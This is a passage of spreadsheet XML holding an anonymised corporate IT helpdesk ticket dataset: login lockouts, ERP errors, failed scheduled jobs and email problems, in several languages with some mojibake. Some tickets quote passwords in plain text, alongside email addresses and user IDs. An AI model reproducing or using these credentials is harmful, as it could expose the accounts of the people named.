    <t xml:space="preserve">we need to change the title for cuibfgna cbmqufoa in outlook to production manager, can you do this ? </t>
  </si>
  <si>
    <t>nwhurdte bldifgck</t>
  </si>
  <si>
    <t>distributor_tool Ã¼berblick / schulung</t>
  </si>
  <si>
    <t xml:space="preserve">hallo_x000D_
danke fÃ¼r ihre antwort._x000D_
ich habe gerade versucht aber es funktioniert nicht._x000D_
ich habe versucht mit demselben benutz-namen und password das ich fÃ¼r SID_34 benutz._x000D_
ich habe auch mit password daypay3 versucht, wie hbmwlprq ilfvyodx vorgeschlafen hat._x000D_
welches passwort sollte ich benutzen?_x000D_
_x000D_
_x000D_
distinti saluti / mit freundlichen grÃ¼ÃŸen / best </t>
  </si>
  <si>
    <t>elivbznp tynvpcfk</t>
  </si>
  <si>
    <t>issue with attendance_tool</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: bajrpckl.cevtiuob@gmail.com_x000D_
_x000D_
hi,_x000D_
_x000D_
   i am not able to login into attendance_tool website and also it is not available on the hub for me._x000D_
_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve"> material in q for complaints shipped to dfrt going into normal bin</t>
  </si>
  <si>
    <t xml:space="preserve">we are having an issue with materials from complaints coming from other locations to plant_105._x000D_
very often â€“ they are in q, but go to a normal bin.  as the q is not printed on the transfer order_x000D_
the receivers place them into our normal bin locations.._x000D_
 _x000D_
examples are delivery 9168844172 for complaint 7611181872_x000D_
 _x000D_
could you pls. check why the material does not go to a q bin location automatically? _x000D_
 _x000D_
pls. assign to les team </t>
  </si>
  <si>
    <t>exel file is not openning as the default programdntym to open with is changed.</t>
  </si>
  <si>
    <t xml:space="preserve">installing cutview </t>
  </si>
  <si>
    <t>sgqthwuf cyahpdfu</t>
  </si>
  <si>
    <t>probleme mit vpn  stÃ¶hrmann \niptbwdq csenjruz</t>
  </si>
  <si>
    <t>add user nuksytoh whovmtez (sbcheyu) to ad group eagcutview</t>
  </si>
  <si>
    <t>no email synchro after windows 10 update on my lumia 950</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: bmudkpie.qolrvbip@gmail.com_x000D_
_x000D_
hello,_x000D_
_x000D_
yesterday i installed the new windows 10 update on my lumia 950 and now the emails are not synchronized._x000D_
_x000D_
will be available in the afternoon, just in case you need me._x000D_
_x000D_
best </t>
  </si>
  <si>
    <t>probleme mit schichtplanung \xpugntjv zcaermdt</t>
  </si>
  <si>
    <t>sales order 35944817: committed date = sunday</t>
  </si>
  <si>
    <t xml:space="preserve">hello it,_x000D_
_x000D_
please check, why the system allows a sundaycommitted date._x000D_
_x000D_
</t>
  </si>
  <si>
    <t>your company guest account credentials</t>
  </si>
  <si>
    <t xml:space="preserve">wie kann ich die gÃ¤ste freischalten ?_x000D_
_x000D_
mit freundlichen grÃ¼ÃŸen i kind </t>
  </si>
  <si>
    <t>gqhyzpxm ztpomxbe</t>
  </si>
  <si>
    <t xml:space="preserve">job Job_1388 failed in job_scheduler at: 08/24/2016 02:44:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job Job_1388 failed in job_scheduler at: 08/24/2016 02:44:00</t>
  </si>
  <si>
    <t>not able to open powerpoint</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: tpflxnhz.bdjiosrp@gmail.com_x000D_
_x000D_
hi it helpdesk,_x000D_
_x000D_
i am not able to open powerpoint slides.  when asked to repair, there is an error message after clicking on "repair".  please help._x000D_
_x000D_
[cid:image001.png@01d1fe14.3da01f40]_x000D_
_x000D_
[cid:image002.png@01d1fe14.3da01f40]_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>tpflxnhz bdjiosrp</t>
  </si>
  <si>
    <t>probleme mit archiving_tool\bfqnvezs vwkasnxe</t>
  </si>
  <si>
    <t>probleme mit erpgui \sqlmtixr urhbvfgd</t>
  </si>
  <si>
    <t>sqlmtixr urhbvfgd</t>
  </si>
  <si>
    <t>probleme mit java \xmlbfjpg yegzbvru</t>
  </si>
  <si>
    <t>error log on vpn server</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: nbdljruw.axcrspyh@gmail.com_x000D_
_x000D_
hello,_x000D_
i can not log in on vpn server. please reset my password._x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>request for access to server HostName_1036 and HostName_1039 (xkjuigsc nrzykspt and quality)</t>
  </si>
  <si>
    <t>with respect to ticket_no1543729, i have received an access from security team but when i open data designer application receiving an error as attached to this incident.
i have checked with mohgrtyan's rds session for dev bods and the data designer is working fine in his session. hence, request assist at an earliest as this access is required for my kt to our upcoming project.
could you please help on this request?</t>
  </si>
  <si>
    <t>ticket update on ticket_no1544198  from wqfzjycu omleknjd</t>
  </si>
  <si>
    <t>please move stock from sales order to unrestricted stock_mm# 7318995 = 40 pcs.</t>
  </si>
  <si>
    <t xml:space="preserve">please move stock from sales order to unrestricted stock_mm# 7318995 = 40 pcs. due to csr is not allowed to do stock movement. kindly help and advise back to us aerp., </t>
  </si>
  <si>
    <t>messsgeraete alkoana pdf datein kann nicht gedureckt werden</t>
  </si>
  <si>
    <t>messsgeraete alkoana pdf datein kann nicht gedureckt warden. pdf datei kann nicht erstellt werden.</t>
  </si>
  <si>
    <t>thnrqxlc yczjdxwk</t>
  </si>
  <si>
    <t>account lock out ; ad</t>
  </si>
  <si>
    <t>engineering_tool, business_client, vpn and engineering_tool issue</t>
  </si>
  <si>
    <t>engineering tool loin</t>
  </si>
  <si>
    <t xml:space="preserve">outlook is prompting for passwords again &amp; again </t>
  </si>
  <si>
    <t xml:space="preserve">need your support </t>
  </si>
  <si>
    <t xml:space="preserve">
received from: ehfvwltg.eakjbtoi@gmail.com
helloï¼Œ
material noï¼š
6380772
6380773
6205289
6205222
6205223
6205282
6719653
4003367
4003579
4003535
can not use in purchasing , please help.
ehfvwltg eakjbtoi
analyst supply planning
e-mail:    ehfvwltg.eakjbtoi@gmail.com&lt;mailto:ehfvwltg.eakjbtoi@gmail.com&gt;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
[
select the following link to view the disclaimer in an alternate language. </t>
  </si>
  <si>
    <t xml:space="preserve"> wifi  for company guest  issue in apac.refer :inc1541551 </t>
  </si>
  <si>
    <t xml:space="preserve">it,_x000D_
_x000D_
please kindly help resolve this ticket again. wifi  for company guest very slowly. please advise the solution to fix it._x000D_
by the way, please find attached wifi package in apac office that domestic 10 mbps, international 2 mbps. (users about 20 pax in office)_x000D_
please kindly suggestion if need package change for i can check other packages with local internet provider vendor._x000D_
_x000D_
</t>
  </si>
  <si>
    <t>received call , hold music was playing on other side and disconnected.</t>
  </si>
  <si>
    <t xml:space="preserve">job Job_3028 failed in job_scheduler at: 08/24/2016 00:02:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job Job_3028 failed in job_scheduler at: 08/24/2016 00:02:00</t>
  </si>
  <si>
    <t>price error between goods receipt and po in SID_34 -urgent</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: tuqrvowp.fxmzkvqo@gmail.com_x000D_
_x000D_
dear team,_x000D_
_x000D_
in erp SID_34 module. we have two errors between goods receipt and po for po no 5616658599\5616715766_x000D_
po no_x000D_
_x000D_
po net price_x000D_
_x000D_
po quantity_x000D_
_x000D_
po price_x000D_
_x000D_
goods receipt price_x000D_
_x000D_
5616658599_x000D_
_x000D_
256.41_x000D_
_x000D_
3_x000D_
_x000D_
769.23_x000D_
_x000D_
900_x000D_
_x000D_
5616715766_x000D_
_x000D_
2641.51_x000D_
_x000D_
1_x000D_
_x000D_
2641.51_x000D_
_x000D_
2393.16_x000D_
_x000D_
_x000D_
usually, po price and goods receipt price are the same price. but these two cases is not._x000D_
please help to have a check the reason. </t>
  </si>
  <si>
    <t>account locked out ; password expired</t>
  </si>
  <si>
    <t>no response from other side</t>
  </si>
  <si>
    <t>erp login account is locked</t>
  </si>
  <si>
    <t>requesting to unlock erp login account</t>
  </si>
  <si>
    <t xml:space="preserve">job Job_3028 failed in job_scheduler at: 08/23/2016 22:02:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job Job_3028 failed in job_scheduler at: 08/23/2016 22:02:00</t>
  </si>
  <si>
    <t xml:space="preserve">email address not picking up automatic </t>
  </si>
  <si>
    <t>would you please help change the email of shipping notification for customer 81956102,70213753,81583828 to 13332407521@1</t>
  </si>
  <si>
    <t xml:space="preserve">from: north service 
sent: wednesday, august 24, 2016 6:43 am
to: nwfodmhc exurcwkm
subject: tru : ç­”å¤: å‡ºè´§å•çš„é‚®ä»¶ä¿®æ”¹
hello help,
would you please help change the email of shipping notification for customer 81956102,70213753,81583828 to 13332407521@163.com
yandy pan
customer experience apac north team
north.service@company.com
è‚¯çº³é£žç¡•é‡‘å±žï¼ˆä¸Šæµ·ï¼‰æœ‰é™å…¬å¸
ä¸Šæµ·å¸‚æµ¦ä¸œæ–°åŒºé‡‘æ¡¥å‡ºå£åŠ å·¥åŒºé‡‘è±«è·¯750å·
é‚®ç¼–ï¼š200126
</t>
  </si>
  <si>
    <t>hnpbcfsz qmvbycax</t>
  </si>
  <si>
    <t>pls help to create delivery note for sto 4908029423</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: gjtyswkb.dpvaymxr@gmail.com_x000D_
_x000D_
dear it,_x000D_
_x000D_
would you pls help to create delivery note for sto 5019130534,for something error we unable to create, it's urgent for plant_298. </t>
  </si>
  <si>
    <t>æ¶‚å±‚ã€ç®¡ä¸è½¦é—´ç”µè¯æ•…éšœ</t>
  </si>
  <si>
    <t>æ¶‚å±‚ã€ç®¡ä¸è½¦é—´ç”µè¯æ•…éšœï¼Œ40634943ã€39523835</t>
  </si>
  <si>
    <t>vrmpysoz qkiucpdx</t>
  </si>
  <si>
    <t>ç½‘ç»œä¸é€š</t>
  </si>
  <si>
    <t>ç½‘ç»œä¸é€šï¼Œå³ä¸‹è§’ç½‘ç»œå›¾æ ‡æ˜¾ç¤ºæœªè¿žæŽ¥åˆ°ç½‘ç»œã€‚</t>
  </si>
  <si>
    <t>inc1544491 fwd: collaboration_platform</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: mdbegvct.dbvichlg@gmail.com_x000D_
_x000D_
i tried opening a discount on my phone and it appears to want me to download this ap on my phone.  is that ok?_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>ms excel file not opening -error procted view -file hangs.</t>
  </si>
  <si>
    <t xml:space="preserve">ms excel file not opening -error procted view -file hangs._x000D_
-connected to the user system using teamviewer._x000D_
-unchecked the proctected view option._x000D_
-caller confirmed that he was able to ope the excel files now._x000D_
-issue resolved._x000D_
</t>
  </si>
  <si>
    <t>unslcdbo jfwqcira</t>
  </si>
  <si>
    <t>this morning i could not log in to my computer so, please lock out my computer.</t>
  </si>
  <si>
    <t xml:space="preserve">this morning i could not log in to my computer so, please lock out my computer._x000D_
id omokam_x000D_
ps mizumoto2_x000D_
</t>
  </si>
  <si>
    <t>svuboezf wegtszum</t>
  </si>
  <si>
    <t xml:space="preserve">user unable to hotel wi-fi </t>
  </si>
  <si>
    <t>user unable to hotel wi-fi _x000D_
-advised the user to shut down the pc for 30 sec and restart the device._x000D_
-opened network and shatryung center and enabled the wi-fi connection._x000D_
-caller confirmed that he was able to login._x000D_
-issue resolved.</t>
  </si>
  <si>
    <t>sgheqbly mcboawld</t>
  </si>
  <si>
    <t>symantec endpoint encryption (see) agent deployment</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: hkrecpfv.kgwpbexv@gmail.com_x000D_
_x000D_
hello.  i don't believe my computer has downloaded the new symantec endpoint encryption (see) agent.  should i be concerned yet?  the received the email about it almost a month ago._x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>wfnbtpkg ixecamwrs email : inplant_843772</t>
  </si>
  <si>
    <t xml:space="preserve">
received from: oetlgbfw.bsctrnwp@gmail.com
i had marftgytins emails being filtered to myself and it was removed
i still have emails being sent to marftgytin instead of myself and i need his emails reset up in my outlook
dthyan matheywtyuews
sales manager gl2
oetlgbfw.bsctrnwp@gmail.com&lt;mailto:oetlgbfw.bsctrnwp@gmail.com&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">job Job_1953d running longer than 30 minutes kirtyled and rerun </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job Job_1953d failed in job_scheduler at: 08/23/2016 17:29:00</t>
  </si>
  <si>
    <t>erp login SID_34 missing.</t>
  </si>
  <si>
    <t>erp login SID_34 missing._x000D_
-connected to the user system using teamviewer._x000D_
-configured the erp SID_34 on the user pc._x000D_
-caller confirmed that he was able to login._x000D_
-issue resolved.</t>
  </si>
  <si>
    <t>erp SID_39 account unlock</t>
  </si>
  <si>
    <t xml:space="preserve">solidworks simulation </t>
  </si>
  <si>
    <t xml:space="preserve">hi,_x000D_
_x000D_
we request you to provide the details/support to beacon india who is providing technical support for solidworks usage at msg design. _x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>mtkpwcxz vxouhram</t>
  </si>
  <si>
    <t>unable to access sales and markhtyeting tab</t>
  </si>
  <si>
    <t>skype screen share issue</t>
  </si>
  <si>
    <t xml:space="preserve">when shatryung my screen the other person is only seeing my mouse error and a beshryu screen.  whenever i give them access to my machine, the view appears.  please advise how to correct, as i do not want to give everyone access to my pc in order to have a screen share.  </t>
  </si>
  <si>
    <t>receiving the following notification in erp-SID_34</t>
  </si>
  <si>
    <t>my inbox is being overwhelmed with notification of a write error.  these appear to be related to south_amerirtca n-fe.  my userid is affiliated with an n-fe transaction,  see attached screenshot</t>
  </si>
  <si>
    <t>errror submitting discount request form in collaboration_platform</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: zfburidj.jmilguev@gmail.com_x000D_
_x000D_
hi there - get the following error when trying to submit this request. can you please look into this for me.- markhty_x000D_
_x000D_
_x000D_
[cid:image001.png@01d1fd58.19c782f0]_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>power outage : cantabria site is hard down at 3:33 pm et on 08/23. no backup circuit for the site.</t>
  </si>
  <si>
    <t>what type of outage:  _x____network     _____circuit     _____power (please specify what type of outage)_x000D_
_x000D_
1. top 23 cert site   ?    __no_______     (yes/no/na) _x000D_
_x000D_
2. when did it start  ?   ___3:33 pm et on 08/23___________________x000D_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 ____    (yes/no/na) _x000D_
_x000D_
6. backup circuit active ?   ______no__     (yes/no/na) _x000D_
_x000D_
7. site contact notified (phone/email) ?  _________     (yes/no/na) _x000D_
_x000D_
8. remote dial-in ?   ____na_______   (yes/no/na) _x000D_
_x000D_
9. equipment reset ?    ___na________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</si>
  <si>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request to reset microsoft online services password for mdbegvct.dbvichlg@gmail.com</t>
  </si>
  <si>
    <t>blank call // no number // no warehouse_tool</t>
  </si>
  <si>
    <t>erp plm - change bom plant_248</t>
  </si>
  <si>
    <t xml:space="preserve">please, change in mass, the mm below at plant_248_x000D_
_x000D_
from to_x000D_
6092264 5981083_x000D_
6092266 5981084_x000D_
6092268 5981085_x000D_
6092269 5981086_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>message:HostName_1147.company.com.is connected? is not connected</t>
  </si>
  <si>
    <t>received reporting_tool alert at 2:53 pm on 08/23 et:_x000D_
_x000D_
HostName_1147.company.com.is connected? is not connected</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: oqvwgnkc.gkjylpzx@gmail.com_x000D_
_x000D_
hello.  i need help getting my phone linked with email and skype.  please see the attached_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>stock transfer order errors - pricing and transfer pricing</t>
  </si>
  <si>
    <t xml:space="preserve">user is attempting to create a stock transfer order (#5019143070) in erp for the following situations and is receiving the errors below:_x000D_
_x000D_
sender reciever material created quantity  requsted quantity  sto number error code_x000D_
plant_105 plant_101 2191584                  1           error in net price calculation, item 000001 (please correct)_x000D_
plant_105 plant_101 2355391                  3            please enter net price_x000D_
_x000D_
could someone please review the rqfhiong zkwfqagbs and pricing to see why the errors are being received by the analyst creating the sto?  an average customer net price (vk13 - zttf) exists for 2191584 so there should be no error.  no average customer net price exists for 2355391 so the system should automatically simulate a price._x000D_
_x000D_
</t>
  </si>
  <si>
    <t>erp login error message</t>
  </si>
  <si>
    <t>error message states "the specified path does not exist"</t>
  </si>
  <si>
    <t xml:space="preserve"> ext.117
since yesterday i'm unable to get on microsoft email, usually i go on the km home page then i go to my bookmarkhty to where the email page is, it keeps loading and doesn't go to the email page</t>
  </si>
  <si>
    <t>import device type settings from s12 to d &amp; q system</t>
  </si>
  <si>
    <t>collaboration_platform login issue.</t>
  </si>
  <si>
    <t>bnphimjq osmwbjva</t>
  </si>
  <si>
    <t>vbgmdxuc egflrbou</t>
  </si>
  <si>
    <t>the same material was posted in two different plants. display material document 5042203567. mov. 541 mm#3475529</t>
  </si>
  <si>
    <t>sometimes we need to send some material to the vendors for manufacturing different kind of new itens to company. in this case, when we sent the mm# 4586630 to the external vendor, the system make two different moviments. one at plant plant_248 and another at plant plant_250. because of this problem, we cannot create a nota financial_toolcal and we cannot reverse the moviment.</t>
  </si>
  <si>
    <t>yjcxvrhu mlqfuapc</t>
  </si>
  <si>
    <t xml:space="preserve">job SID_53hotf failed in job_scheduler at: 08/23/2016 13:16:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job SID_53hotf failed in job_scheduler at: 08/23/2016 13:16:00</t>
  </si>
  <si>
    <t>unlocked erp password</t>
  </si>
  <si>
    <t>fyjivxud ztasbivg</t>
  </si>
  <si>
    <t xml:space="preserve">job SID_41hotf failed in job_scheduler at: 08/23/2016 12:45:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job SID_41hotf failed in job_scheduler at: 08/23/2016 12:45:00</t>
  </si>
  <si>
    <t xml:space="preserve">job SID_53hotf failed in job_scheduler at: 08/23/2016 12:42:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job SID_53hotf failed in job_scheduler at: 08/23/2016 12:42:00</t>
  </si>
  <si>
    <t xml:space="preserve">job SID_44hotf failed in job_scheduler at: 08/23/2016 12:43:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job SID_44hotf failed in job_scheduler at: 08/23/2016 12:43:00</t>
  </si>
  <si>
    <t>user called in for an update</t>
  </si>
  <si>
    <t>login + password very urgent for esprit</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: ufzxpadv.hnxmotwu@gmail.com_x000D_
_x000D_
hello,_x000D_
_x000D_
i would like a login and password for our partner from dp technology for tomorrow ?_x000D_
_x000D_
is it possible to create it aerp?_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>ufzxpadv hnxmotwu</t>
  </si>
  <si>
    <t>need to create a partial delivery today on so 35645376 which is structured using the higher level linkage.</t>
  </si>
  <si>
    <t xml:space="preserve">when creating the delivery note it reflects the correct quantities, but when saving it defaults to full quantities.  attached is a listing of what line items and quantities are needed.  shipment needs to be made to day.  customer is in need.  </t>
  </si>
  <si>
    <t>lead form component not working in prod</t>
  </si>
  <si>
    <t xml:space="preserve">i have just discovered the lead forms for both road king and beyond evolution are not working. both pages can be found by clicking the banners on the english homepage. then try clicking the call to action buttons (see attached). also there is a page in qa i used for uacyltoe hxgayczeing, it is also not working._x000D_
_x000D_
#/content/company/en/recs-uacyltoe hxgaycze/responsive-recs.html_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>computer loading temp profile whenever user is logging in with his id and password</t>
  </si>
  <si>
    <t>computer loading temp profile whenever user is logging in with his id and password._x000D_
_x000D_
user id - bhergtyemm</t>
  </si>
  <si>
    <t>erp plm - engineering tool programdnty start error</t>
  </si>
  <si>
    <t>post login screen receiving attached error_x000D_
_x000D_
reinstalled java to the recommended version (32 and 64 bit)_x000D_
deleted engineering tool install from programdnty data folder and retried install, still no go._x000D_
_x000D_
verified login ability to SID_34 system with same id and password._x000D_
_x000D_
please contact ertnhxkf gwjibhxm to get access to this new pc</t>
  </si>
  <si>
    <t>hiqkujla vwkdmntg</t>
  </si>
  <si>
    <t>printer not kicking out delivery notes</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: rtpmlwnk.unpambrv@gmail.com_x000D_
_x000D_
hi,_x000D_
_x000D_
i work at the usa, il plant.  when we enter orders in erp they would always kick out the "delivery note".   for some reason, they have stopped printing.  raifstow gfeymtql and i both are not receiving the delivery notes for the reconditioning orders.  i have a screen shot below that shows that i am set up for printer output device "qv20 ".  can you help to make our delivery notes "automatic" like previously?_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>unable to launch hr_tool etime</t>
  </si>
  <si>
    <t xml:space="preserve">i cannot open a pptx file that was attached to an email.  gives a repair error. </t>
  </si>
  <si>
    <t>unable to see fioghtna wightygins emails</t>
  </si>
  <si>
    <t>vip 2: unable to login to the hub</t>
  </si>
  <si>
    <t>create delivery note  2053495 / plant plant_120 / slc 0088 / apo error / urgent  eilt</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: tkuivxrn.urdgitsv@gmail.com_x000D_
_x000D_
help,_x000D_
_x000D_
plaese create delivery note for material 2053495, to be shipped to plant_223._x000D_
_x000D_
please also advice why apo does not work correct and what corrective actions are required._x000D_
_x000D_
franhtyu,_x000D_
_x000D_
fyi, what reason caused this error? did you investigate?_x000D_
_x000D_
kind </t>
  </si>
  <si>
    <t>ticket update inplant_852304</t>
  </si>
  <si>
    <t>unable to login to dell 7350 tablet</t>
  </si>
  <si>
    <t>bycusxji qeafbkro</t>
  </si>
  <si>
    <t>internet through telecom_vendor_3 now working</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: ywfhcuki.dajkmxcl@gmail.com_x000D_
_x000D_
hello,_x000D_
_x000D_
i always get the error of limited connectivity even after having good network of telecom_vendor_3._x000D_
_x000D_
_x000D_
[cid:image001.png@01d1fd75.1e9817a0]_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>ywfhcuki dajkmxcl</t>
  </si>
  <si>
    <t>unable to download a software</t>
  </si>
  <si>
    <t>access to drawings</t>
  </si>
  <si>
    <t>name:mikhghytr karaffa
language:
browser:microsoft internet explorer
email:vfrdxtqw.jfbmsenz@gmail.com
customer number:
telephone:
summary:requesting drawing access in erp modeling majetkm</t>
  </si>
  <si>
    <t xml:space="preserve">from: nwfodmhc exurcwkm _x000D_
sent: tuesday, august 23, 2016 4:35 pm_x000D_
to: mkjubdti fbusqrlt_x000D_
cc: tiyhum kuyiomar_x000D_
subject: request to reset microsoft online services password for mkjubdti.fbusqrlt@gmail.com_x000D_
_x000D_
hi rodny_x000D_
_x000D_
please change your password in _x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>mkjubdti fbusqrlt</t>
  </si>
  <si>
    <t>ticket update on inplant_853211</t>
  </si>
  <si>
    <t>re: please take this survey related to ticket_no0432312</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: cowqyjzm.fzsxgapt@gmail.com_x000D_
_x000D_
has this been remapped?_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>delivery notes has generated delivery-with wrong delivery pieces</t>
  </si>
  <si>
    <t xml:space="preserve">delivery notes has generated delivery-with wrong delivery pieces_x000D_
_x000D_
one of the colleague generated dn with actuall pieces 450 pcs. with mm 3332059_x000D_
but when the delivery note was printed we notices that it shows the deliverable pieces as 450 pcs. instead of 400 pcs._x000D_
erp should not allow this??_x000D_
there was earlier kind of issue, reference ticket inc1188203_x000D_
</t>
  </si>
  <si>
    <t>mtwzniyh orbjskip</t>
  </si>
  <si>
    <t>german call // caller disconnected after hearing english</t>
  </si>
  <si>
    <t>the caller id display on users desk phone does not display correctly</t>
  </si>
  <si>
    <t xml:space="preserve">from: cwuospin nbhoxqpe 
sent: tuesday, august 23, 2016 5:19 pm
to: chukhyt mcnerny; -facility; nwfodmhc exurcwkm
subject: amar re: desk phone
help desk,
please see chukhyt's request
sincerely,
stanfghyley guhtykes, fmp
facilities manager, world headquarters
cwuospin.nbhoxqpe@gmail.com
</t>
  </si>
  <si>
    <t>need to add additional mailboxes</t>
  </si>
  <si>
    <t>ticket_no1544198 - ticket update</t>
  </si>
  <si>
    <t xml:space="preserve">job Job_1314 failed in job_scheduler at: 08/23/2016 08:45:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job Job_1314 failed in job_scheduler at: 08/23/2016 08:45:00</t>
  </si>
  <si>
    <t>erp connections issue</t>
  </si>
  <si>
    <t>reset the password for gÃ¼lperi akÃ¶z on erp / production / hcm</t>
  </si>
  <si>
    <t>on erp SID_34, SID_37 i  want to reset my password.</t>
  </si>
  <si>
    <t>plbwhxqt tqzdygxw</t>
  </si>
  <si>
    <t>kiosk user - account expired // onjzqptl kgxmisbj</t>
  </si>
  <si>
    <t xml:space="preserve">cannot open attachments in owa, shows a white screen when opening. </t>
  </si>
  <si>
    <t>ufixygtn yuoxcmek</t>
  </si>
  <si>
    <t>cannot access crm</t>
  </si>
  <si>
    <t xml:space="preserve">cannot access crm - my contact info is </t>
  </si>
  <si>
    <t xml:space="preserve">logon balancing error on erp </t>
  </si>
  <si>
    <t xml:space="preserve">performance improvement for supervisor dashbankrd </t>
  </si>
  <si>
    <t xml:space="preserve">performance improvement for supervisor dashbankrd._x000D_
_x000D_
</t>
  </si>
  <si>
    <t>reset the password for chkmejsn lvidgknc on erp / production / erp</t>
  </si>
  <si>
    <t>please unlock my erp account.  i know the password.</t>
  </si>
  <si>
    <t>skype will not let me sign in.  says "the address you typed is not valid"</t>
  </si>
  <si>
    <t>wjtzrmqc ikqpbflg</t>
  </si>
  <si>
    <t xml:space="preserve">job SID_24arc1 failed in job_scheduler at: 08/23/2016 07:02:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job SID_24arc1 failed in job_scheduler at: 08/23/2016 07:02:00</t>
  </si>
  <si>
    <t>user id locked</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: bqyfwclo.osjklifb@gmail.com_x000D_
_x000D_
hello,_x000D_
_x000D_
could you please unlock user id teufeae (upiyobvj lwohuizr)._x000D_
_x000D_
our it hotline cannot be reached._x000D_
_x000D_
</t>
  </si>
  <si>
    <t>bqyfwclo osjklifb</t>
  </si>
  <si>
    <t xml:space="preserve">job SID_30arc1 failed in job_scheduler at: 08/23/2016 06:50:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job SID_30arc1 failed in job_scheduler at: 08/23/2016 06:50:00</t>
  </si>
  <si>
    <t>collaboration_platform cloud ordner gelÃ¶scht</t>
  </si>
  <si>
    <t xml:space="preserve">
received from: uwncfovt.vxjbunfi@gmail.com
guten tag,
ganz wichtig! meine kompletten daten!! sind gelÃ¶scht! selbst in der cloud wurde der ordner â€žvw team" komplett gelÃ¶scht!
bitte den â€žvw ordner" wiederherstellen mit datum von gestern! wenn das geht! ganz wichtig!
mit freundlichen grÃ¼ÃŸen
uwncfovt vxjbunfi
sales engineer
mail: uwncfovt.vxjbunfi@gmail.com&lt;mailto:uwncfovt.vxjbunfi@gmail.com&gt;
company deutschland gmbh
geschÃ¤ftsfÃ¼hrer: rfwlsoej yvtjzkaw, phvkowml azbtkqwx, naruedlk mpvhakdq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</si>
  <si>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uwncfovt vxjbunfi</t>
  </si>
  <si>
    <t xml:space="preserve">job SID_23arc1 failed in job_scheduler at: 08/23/2016 06:31:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job SID_23arc1 failed in job_scheduler at: 08/23/2016 06:31:00</t>
  </si>
  <si>
    <t xml:space="preserve">job Job_711 failed in job_scheduler at: 08/23/2016 06:27:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job Job_711 failed in job_scheduler at: 08/23/2016 06:27:00</t>
  </si>
  <si>
    <t xml:space="preserve">job Job_2021a failed in job_scheduler at: 08/23/2016 06:20:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job Job_2021a failed in job_scheduler at: 08/23/2016 06:20:00</t>
  </si>
  <si>
    <t xml:space="preserve">job SID_23arc2 failed in job_scheduler at: 08/23/2016 06:16:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job SID_23arc2 failed in job_scheduler at: 08/23/2016 06:16:00</t>
  </si>
  <si>
    <t xml:space="preserve">need erp access to user vv180822 for erp incident </t>
  </si>
  <si>
    <t>system (SID_34, SID_37, SID_39, SID_38, hrp, other ?): SID_21 &amp; SID_1_x000D_
_x000D_
enter user id of user having the issue: vv180822_x000D_
_x000D_
transaction code(s) the user needs or was working with: z:plm_general, z:plm_change_coordinator, spro_x000D_
_x000D_
describe the issue: can you please create an user account for the erp incident 263306 / 2016 in SID_21 &amp; SID_1. please set the user type to dialog, since erp will need business_client access to create er. please open the wts and http connection also. they would need an active directory account and please give access to roles z:plm_general, z:plm_change_coordinator, spro_x000D_
_x000D_
if you are getting a "not authorized" message, recreate the condition then do   /nsu53   and attach result to the ticketing_tool ticket. external erp user_x000D_
_x000D_
provide access the same as this other user: gthydanp</t>
  </si>
  <si>
    <t xml:space="preserve">job Job_714 failed in job_scheduler at: 08/23/2016 06:11:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
